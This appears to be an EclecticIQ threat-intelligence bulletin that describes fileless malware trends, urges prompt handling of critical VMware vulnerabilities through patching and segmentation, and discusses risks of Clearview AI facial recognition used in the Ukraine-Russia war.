Malware Trends: Responding to Fileless Malware Requires Forward Leaning Vulnerability Management
It appears 2022 is the year fileless malware becomes a more frequent threat. A fileless malware attack is a technique threat actors use to inject malicious code directly into the memory of either a mobile device or a computer, rather than dropping a malicious file on the device’s disk. All operating systems are vulnerable to these attacks; common TTPs include Vermillion for Linux, Cobalt Strike for Windows, and the Lazarus Group for MacOS (2, 4). These attacks are currently utilizing social engineering tactics to compromise a system by sending phishing messages containing malicious links the user needs to click on, mobile text messages, or phone calls directing the user to visit a certain malicious site to steal credentials (2, 6). Once the user activates the link, the process uses Flash or equivalent software to open Windows PowerShell and run commands operating on memory to inject a payload instructing the device to carry out malicious behavior like data exfiltration, or to run malicious scripts from a botnet (3). Fileless malware is the least detectable because it contains no identifiable signature or behavior, no files to scan as it relies on memory, and can exist with ransomware such as Ryuk or Conti (4, 5). Typical detection methods, for this reason, will not be successful.
Fileless malware cannot infect a device without exploiting a vulnerability to obtain administrative privileges in an operating systems tool like PowerShell (22, 23). A “perfect” patch management program would be the optimal solution but may not be the most realistic solution examined by EIQ intelligence analysts. The first step in protecting against fileless malware is to have visibility into the operating environment that includes a thorough understanding of the corporate network, how it connects to personal and corporate mobile devices, and what opportunities for segmentation exist to block critical pathways into high-value assets. Prioritizing key environmental infrastructures, such as those created by VMware, Azure, or AWS is ideal as vulnerabilities are exploited more frequently than the day after Microsoft's “Patch Tuesday”. Ransomware and other destructive malware types can take over a system in just a few minutes as examined by EclecticIQ analysts (1,5).
Critical Vulnerabilities: VMware and Frequently Exploited Applications
Software company VMware announced the existence of critical vulnerabilities tracked as CVE-2022-22954 and CVE-2022-22960 on April 6th, 2022 (10). The company also released an emergency directive for these vulnerabilities and for CVE-2022-22972 and CVE-2022-22973, which VMware disclosed on May 18, 2022 (11). These four vulnerabilities, when exploited together, allow for total system control of a victim’s machine including any connected network, opening the door for malware to drop, such as spyware, data exfiltration, ransomware, or other malicious software to take advantage of the network (11, 12, 13).
Broadcom’s attempted takeover of VMware casts uncertainty about how VMware will handle these vulnerabilities in the future. On May 22nd, the company took over the majority shares in a $61 billion dollar buyout bid (14). VMware still has the option to choose another buyer, but they will have to buy out 1.6 billion dollars' worth of Broadcom stock to succeed (14). The relevance here is that the potential takeover creates uncertainty about the consistency of VMware product updates once bought out, and whether the company would allow critical vulnerabilities to persist or go undetected (13).
The emergency directive described above urges network defenders to take action to reassess current security measures regarding environments running VMware, due to the immediate availability of exploits from threat actor’s ability to swiftly reverse engineer VMware updates and turn them into new exploits (8-13). Analysts at EclecticIQ recommend identifying and assessing the criticality of externally facing network routes in environments running VMware software and redesigning a more isolated environment through segmentation and multifactor enablement where able. Analysts also recommend incorporating rulesets in firewalls and endpoint solutions which only allow known behavior to occur regarding VMware within a specified period which corresponds to normal operations in each company's specific environment.
New and Noteworthy: AI Facial Recognition Used in Ukraine/Russia War
In late March, researchers discovered that the Ukrainian IT Army utilizes Clearview AI facial recognition in psychological warfare to identify fallen soldiers to send death notifications to their families (15,16). On May 17th, the CEO of Clearview AI, Hoan Ton-That, gave an interview addressing this controversial use of the software in which he mentioned the company's current goal of obtaining 100 billion facial images for inclusion in the database this year (19). The CEO claims this technology dissuades terrorism and other violent acts by quickly obtaining attribution to those physical crimes (19, 20). Since the onset of the Russian invasion, three hundred forty officials in the Ukrainian government received free access to this tool, not including the unauthorized use by the Ukrainian IT Army (16, 17).
Researchers at EIQ examined the malware trends for 2022 which included an increase in the number of data manipulation capable malware including Remote Access Trojans, Worms, Rootkits, and Fileless Malware. EIQ analysts examined the risks of this new AI software and note this technology is vulnerable to data manipulation malware. These types of malware can export data, change data, or add data that can be used to falsely incriminate or incorrectly identify an individual. Clearview AI, for example, collects photos and assumes descriptions of the photos are accurate when confirming identify claims; for example, a photograph uploaded with the description of “Russian soldier” will identify this person as a Russian soldier, even if that person is not in the military and has no actual Russian ties (19). WannaCry and the SolarWinds incident are examples of how threat actors can achieve privilege escalation and manipulate the integrity of the data allowing for false accusations, replacements, or deletion of specific individuals. The CEO has not spoken on the plan to counter these capabilities nor address the privacy concerns regarding state and country laws.
You might also be interested in:
Five Ways the Ukraine-Russia War Could Alter the Cyber Landscape
The Analyst Prompt #07: Ukraine War Related Cyberattack Risk Increases Outside the Main Conflict And Fluid Cybercriminal Marketplaces Maintain Strong User Bases
Tools to Identify Exfiltration of Large Cryptocurrency Holdings Will Reduce Risk of Large Cyberattacks and Fraud on DeFi Platforms
Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.
TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery
You may also download the content as eiq_json, stix1_2, stix2_1.
Please refer to our support page for guidance on how to access the feeds.
About EclecticIQ Threat Research
EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Threat Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.
We would love to hear from you. Please send us your feedback by emailing us at email@example.com or fill in the EclecticIQ Audience Interest Survey to drive our research towards your priority area..